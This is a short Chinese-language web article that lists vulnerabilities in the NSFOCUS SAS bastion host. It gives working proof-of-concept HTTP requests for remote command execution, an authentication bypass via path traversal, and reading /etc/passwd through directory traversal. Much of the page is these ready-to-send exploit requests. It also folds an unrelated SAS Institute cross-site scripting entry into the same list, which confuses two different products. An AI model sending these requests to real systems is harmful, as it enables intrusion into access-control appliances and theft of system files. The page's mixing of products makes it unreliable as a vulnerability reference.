类别 | 描述 |
绿盟 SAS 堡垒机 Exec 远程命令执行漏洞 | 攻击者可以通过发送特制的HTTP请求,执行任意系统命令,通过访问/webconf/Exec/index?cmd=id ,可以获取系统的ID信息。 |
绿盟 SAS 堡垒机 local_user.php 权限绕过漏洞 | 未经身份认证的攻击者可以访问通常无权访问的敏感资源,导致系统处于极度不安全状态。 |
绿盟 SAS 堡垒机 GetFile 任意文件读取漏洞 | 攻击者可以通过漏洞读取服务器中的任意文件,例如通过访问/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd 。 |
SAS Institute SAS Admin Console 9.4 TS1M2跨站脚本漏洞 | 该漏洞源于程序未对用户创建和编辑表单字段的数据输入进行正确验证和过滤,攻击者可利用该漏洞进行跨站脚本攻击。 |
详细分析与复现
绿盟 SAS 堡垒机 Exec 远程命令执行漏洞
漏洞复现:
利用地址:/webconf/Exec/index?cmd=id
POC:GET /webconf/Exec/index?cmd=id HTTP/1.1 Host: 127.0.0.1 Cookie: PHPSESSID=4b250694b3e897d381aaa03eefd55509 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/122.0 Gecko/20100101 Firefox/122.0 Iceweasel/37.0.15.15 Safari/537.36
绿盟 SAS 堡垒机 local_user.php 权限绕过漏洞
漏洞复现:
POC:GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1
绿盟 SAS 堡垒机 GetFile 任意文件读取漏洞
漏洞复现:
利用地址:/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd
SAS Institute SAS Admin Console 9.4 TS1M2跨站脚本漏洞
漏洞描述:该漏洞允许攻击者在受影响的系统中注入并执行恶意脚本,可能导致信息泄露、会话劫持等安全问题。
列出了SAS相关的多个漏洞及其详细描述和复现方法,这些漏洞的存在可能会对系统的安全性产生严重影响,建议相关用户及时更新或采取相应的安全措施。
以上就是关于“sas漏洞”的问题,朋友们可以点击主页了解更多内容,希望可以够帮助大家!
本文来源于互联网,如若侵权,请联系管理员删除,本文链接:https://www.9969.net/80676.html